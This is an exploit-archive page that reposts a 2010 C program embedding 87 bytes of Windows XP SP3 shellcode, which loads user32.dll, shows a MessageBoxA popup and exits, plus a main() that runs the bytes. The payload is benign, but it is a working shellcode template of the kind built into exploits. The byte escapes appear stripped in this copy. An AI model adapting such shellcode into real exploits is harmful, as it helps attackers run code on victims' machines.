Home / os / win7

win32/xp sp3 (En) MessageBoxA Shellcode 87 bytes

Posted on 20 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>win32/xp sp3 (En) MessageBoxA Shellcode 87 bytes</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================
win32/xp sp3 (En) MessageBoxA Shellcode 87 bytes
================================================

/*
Title: Windows XP SP3 English MessageBoxA Shellcode (87 bytes)
Date: August 20, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Tested on: Windows XP SP3 En
Thanks: ishtus
Greetz: Astalavista, OffSEC, Exploit-DB
*/
 
#include &lt;stdio.h&gt;
 
char shellcode[] =
&quot;x31xc0x31xdbx31xc9x31xd2&quot;
&quot;x51x68x6cx6cx20x20x68x33&quot;
&quot;x32x2ex64x68x75x73x65x72&quot;
&quot;x89xe1xbbx7bx1dx80x7cx51&quot; // 0x7c801d7b ; LoadLibraryA(user32.dll)
&quot;xffxd3xb9x5ex67x30xefx81&quot;
&quot;xc1x11x11x11x11x51x68x61&quot;
&quot;x67x65x42x68x4dx65x73x73&quot;
&quot;x89xe1x51x50xbbx40xaex80&quot; // 0x7c80ae40 ; GetProcAddress(user32.dll, MessageBoxA)
&quot;x7cxffxd3x89xe1x31xd2x52&quot;
&quot;x51x51x52xffxd0x31xc0x50&quot;
&quot;xb8x12xcbx81x7cxffxd0&quot;;    // 0x7c81cb12 ; ExitProcess(0)
 
int main(int argc, char **argv)
{
   int (*func)();
   func = (int (*)()) shellcode;
   printf(&quot;Shellcode Length is : %d&quot;,strlen(shellcode));
   (int)(*func)();
    
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-20]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :